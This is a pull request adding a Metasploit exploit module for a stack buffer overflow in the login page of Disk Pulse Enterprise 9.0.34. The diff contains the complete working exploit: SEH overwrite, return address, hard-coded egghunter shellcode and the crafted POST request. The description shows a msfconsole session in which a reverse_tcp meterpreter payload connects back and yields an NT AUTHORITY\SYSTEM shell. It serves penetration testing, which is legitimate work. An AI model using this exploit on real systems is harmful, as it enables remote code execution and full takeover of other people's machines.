### PR TITLE
Added Disk Pulse Enterprise Login Buffer Overflow

### DIFF
--- a/modules/exploits/windows/http/disk_pulse_enterprise_bof.rb
+++ b/modules/exploits/windows/http/disk_pulse_enterprise_bof.rb
@@ -1,0 +1,120 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::Egghunter
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Disk Pulse Enterprise Login Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a stack buffer overflow in Disk Pulse Enterprise
+        9.0.34. If a malicious user sends a malicious HTTP login request,
+        it is possible to execute a payload that would run under the Windows
+        NT AUTHORITY\SYSTEM account. Due to size constraints, this module 
+        uses the Egghunter technique.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Chris Higgins', # msf Module -- @ch1gg1ns
+          'Tulpa Security' # Original discovery -- @tulpa_security
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '40452' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'BadChars' => "\x00\x0a\x0d\x26"
+        },
+      'Targets'        =>
+        [
+          [ 'Disk Pulse Enterprise 9.0.34',
+            {
+              'Ret' => 0x10013AAA, # pop ebp # pop ebx # ret 0x04 - libspp.dll
+              'Offset' => 12600
+            }
+          ],
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Oct 03 2016',
+      'DefaultTarget'  => 0))
+
+    register_options([Opt::RPORT(80)], self.class)
+
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri'    => '/',
+      'method' => 'GET'
+    })
+
+    if res and res.code == 200 and res.body =~ /Disk Pulse Enterprise v9\.0\.34/
+      return Exploit::CheckCode::Appears
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    connect
+    eggoptions =
+    {
+      :checksum => true,
+      :eggtag => "w00t"
+    }
+    
+    print_status("Generating exploit...")
+
+    sploit =  "username=admin"
+    sploit << "&password=aaaaa\r\n"    
+
+    # Would like to use generate_egghunter(), looking for improvement
+    egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+    egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+    sploit << rand_text(target['Offset'] - payload.encoded.length)
+    sploit << "w00tw00t"
+    sploit << payload.encoded
+    sploit << make_nops(70)
+    sploit << rand_text(1614)
+    # Would like to use generate_seh_record(), looking for improvement
+    sploit << "\x90\x90\xEB\x0B"
+    sploit << "\x33\xA3\x01\x10"
+    sploit << make_nops(20)
+    sploit << egghunter
+    sploit << make_nops(7000)
+
+    # Total exploit size should be 21747
+    print_status("Total exploit size: " + sploit.length.to_s)
+    print_status("Triggering the exploit now...")
+    print_status("Please be patient, the egghunter may take a while...")
+
+    res = send_request_cgi({
+      'uri' => '/login',
+      'method' => 'POST',
+      'content-type' => 'application/x-www-form-urlencoded',
+      'content-length' => '17000',
+      'data' => sploit
+    })
+
+    handler
+    disconnect
+
+  end
+end

--- a/modules/exploits/windows/http/disk_pulse_enterprise_bof.rb
+++ b/modules/exploits/windows/http/disk_pulse_enterprise_bof.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote
         This module exploits a stack buffer overflow in Disk Pulse Enterprise
         9.0.34. If a malicious user sends a malicious HTTP login request,
         it is possible to execute a payload that would run under the Windows
-        NT AUTHORITY\SYSTEM account. Due to size constraints, this module 
+        NT AUTHORITY\SYSTEM account. Due to size constraints, this module
         uses the Egghunter technique.
       },
       'License'        => MSF_LICENSE,
@@ -78,11 +78,11 @@ class MetasploitModule < Msf::Exploit::Remote
       :checksum => true,
       :eggtag => "w00t"
     }
-    
+
     print_status("Generating exploit...")
 
     sploit =  "username=admin"
-    sploit << "&password=aaaaa\r\n"    
+    sploit << "&password=aaaaa\r\n"
 
     # Would like to use generate_egghunter(), looking for improvement
     egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"


### PR DESCRIPTION
Adding a buffer overflow exploit for Disk Pulse Enterprise 9.0.34 for Microsoft Windows. This module is porting a PoC exploit which can be found on the [Exploit DB page](https://www.exploit-db.com/exploits/40452/).

At it's current stage, this exploit is fully functional though it has two imperfections:
- Egghunter is hard-coded, doesn't use `generate_egghunter()`
- SEH is hard-coded, doesn't use `generate_seh_record()`

I spent some time trying to get these to work, but I'm at wits end trying to figure it out. After talking with @wvu-r7 on IRC, figured that since the exploit works that I'd go ahead and submit a PR.
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use exploit/windows/http/disk_pulse_enterprise_bof`
- [x] Set RHOST to the host to exploit
- [x] Set your payload. For example `set payload windows/meterpreter/reverse_tcp`
- [x] Set LHOST to your local address
- [x] `exploit`
- [x] Wait for the egghunter to complete, finding and executing your shellcode
- [x] **Verify** payload completes

```
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.com


       =[ metasploit v4.12.39-dev-9672759                 ]
+ -- --=[ 1597 exploits - 909 auxiliary - 274 post        ]
+ -- --=[ 458 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/windows/http/disk_pulse_enterprise_bof 
msf exploit(disk_pulse_enterprise_bof) > set rhost 192.168.1.28
rhost => 192.168.1.28
msf exploit(disk_pulse_enterprise_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(disk_pulse_enterprise_bof) > set lhost 192.168.1.26
lhost => 192.168.1.26
msf exploit(disk_pulse_enterprise_bof) > show options

Module options (exploit/windows/http/disk_pulse_enterprise_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.1.28     yes       The target address
   RPORT    80               yes       The target port
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.26     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Disk Pulse Enterprise 9.0.34


msf exploit(disk_pulse_enterprise_bof) > exploit

[*] Started reverse TCP handler on 192.168.1.26:4444 
[*] Generating exploit...
[*] Total exploit size: 21383
[*] Triggering the exploit now...
[*] Please be patient, the egghunter may take a while...
[*] Sending stage (957999 bytes) to 192.168.1.28
[*] Meterpreter session 1 opened (192.168.1.26:4444 -> 192.168.1.28:49163) at 2016-10-27 21:45:52 -0500

meterpreter > sysinfo 
Computer        : WIN7X86
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
```
